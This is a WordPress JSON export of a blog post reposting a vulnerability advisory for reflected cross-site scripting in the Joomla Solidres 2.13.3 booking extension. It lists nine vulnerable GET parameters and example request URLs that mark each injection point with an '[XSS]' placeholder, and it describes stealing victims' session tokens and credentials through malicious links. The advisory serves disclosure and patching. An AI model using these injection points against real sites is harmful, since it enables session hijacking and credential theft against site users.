{"id":45830,"date":"2023-07-28T18:15:03","date_gmt":"2023-07-28T14:15:03","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173801\/joomlasolidres2133-xss.txt"},"modified":"2023-07-28T23:34:18","modified_gmt":"2023-07-28T19:04:18","slug":"joomla-solidres-2-13-3-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/joomla-solidres-2-13-3-cross-site-scripting\/","title":{"rendered":"Joomla Solidres 2.13.3 Cross Site Scripting"},"content":{"rendered":"<p># Exploit Title: Joomla Solidres 2.13.3 &#8211; Reflected XSS<br \/>\n# Exploit Author: CraCkEr<br \/>\n# Date: 28\/07\/2023<br \/>\n# Vendor: Solidres Team<br \/>\n# Vendor Homepage: http:\/\/solidres.com\/<br \/>\n# Software Link: https:\/\/extensions.joomla.org\/extension\/vertical-markets\/booking-a-reservations\/solidres\/<br \/>\n# Demo: http:\/\/demo.solidres.com\/joomla<br \/>\n# Tested on: Windows 10 Pro<br \/>\n# Impact: Manipulate the content of the site<\/p>\n<p>## Greetings<\/p>\n<p>The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br \/>\nCryptoJob (Twitter) twitter.com\/0x0CryptoJob<\/p>\n<p>## Description<\/p>\n<p>The attacker can send to victim a link containing a malicious URL in an email or instant message<br \/>\ncan perform a wide variety of actions, such as stealing the victim&#8217;s session token or login credentials<\/p>\n<p>GET parameter &#8216;show&#8217; is vulnerable to XSS<br \/>\nGET parameter &#8216;reviews&#8217; is vulnerable to XSS<br \/>\nGET parameter &#8216;type_id&#8217; is vulnerable to XSS<br \/>\nGET parameter &#8216;distance&#8217; is vulnerable to XSS<br \/>\nGET parameter &#8216;facilities&#8217; is vulnerable to XSS<br \/>\nGET parameter &#8216;categories&#8217; is vulnerable to XSS<br \/>\nGET parameter &#8216;prices&#8217; is vulnerable to XSS<br \/>\nGET parameter &#8216;location&#8217; is vulnerable to XSS<br \/>\nGET parameter &#8216;Itemid&#8217; is vulnerable to XSS<\/p>\n<p>https:\/\/website\/joomla\/greenery_hub\/index.php\/en\/hotels\/reservations?location=d2tff&#038;task=hub.search&#038;ordering=score&#038;direction=desc&#038;type_id=0&#038;show=[XSS]\n<p>https:\/\/website\/joomla\/greenery_hub\/index.php?option=com_solidres&#038;task=hub.updateFilter&#038;location=italy&#038;checkin=27-07-2023&#038;checkout=28-07-2023&#038;option=com_solidres&#038;Itemid=306&#038;a0b5056f4a0135d4f5296839591a088a=1distance=0-11&#038;distance=0-11&#038;reviews=[XSS]&#038;facilities=18&#038;<\/p>\n<p>https:\/\/website\/joomla\/greenery_hub\/index.php\/en\/hotels\/reservations?location=d2tff&#038;task=hub.search&#038;ordering=score&#038;direction=desc&#038;type_id=[XSS]\n<p>https:\/\/website\/joomla\/greenery_hub\/index.php\/en\/hotels\/reservations?location=italy&#038;checkin=27-07-2023&#038;checkout=28-07-2023&#038;option=com_solidres&#038;task=hub.search&#038;Itemid=306&#038;a0b5056f4a0135d4f5296839591a088a=1distance=0-11&#038;distance=[XSS]&#038;facilities=14<\/p>\n<p>https:\/\/website\/joomla\/greenery_hub\/index.php\/en\/hotels\/reservations?location=italy&#038;checkin=27-07-2023&#038;checkout=28-07-2023&#038;option=com_solidres&#038;task=hub.search&#038;Itemid=306&#038;a0b5056f4a0135d4f5296839591a088a=1distance=0-11&#038;distance=0-11&#038;facilities=[XSS]\n<p>https:\/\/website\/joomla\/greenery_hub\/index.php\/en\/hotels\/reservations?location=italy&#038;checkin=27-07-2023&#038;checkout=28-07-2023&#038;option=com_solidres&#038;task=hub.search&#038;Itemid=306&#038;a0b5056f4a0135d4f5296839591a088a=1distance=0-25&#038;distance=0-25&#038;categories=[XSS]\n<p>https:\/\/website\/joomla\/greenery_hub\/index.php?option=com_solidres&#038;task=hub.updateFilter&#038;location=d2tff&#038;ordering=distance&#038;direction=asc&#038;prices=[XSS]\n<p>https:\/\/website\/joomla\/greenery_hub\/index.php\/en\/hotels\/reservations?location=[XSS]&#038;task=hub.search&#038;ordering=score&#038;direction=desc&#038;type_id=11<\/p>\n<p>https:\/\/website\/joomla\/greenery_hub\/index.php\/en\/hotels\/reservations?location=italy&#038;checkin=27-07-2023&#038;checkout=28-07-2023&#038;option=com_solidres&#038;task=hub.search&#038;Itemid=[XSS]&#038;a0b5056f4a0135d4f5296839591a088a=1distance=0-11&#038;distance=0-11&#038;facilities=14<\/p>\n[-] Done<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Joomla Solidres 2.13.3 &#8211; Reflected XSS # Exploit Author: CraCkEr # Date: 28\/07\/2023 # Vendor: Solidres Team # Vendor Homepage: http:\/\/solidres.com\/ # Software Link: https:\/\/extensions.joomla.org\/extension\/vertical-markets\/booking-a-reservations\/solidres\/ # Demo: http:\/\/demo.solidres.com\/joomla # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45830","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45830","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45830"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45830\/revisions"}],"predecessor-version":[{"id":45855,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45830\/revisions\/45855"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45830"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}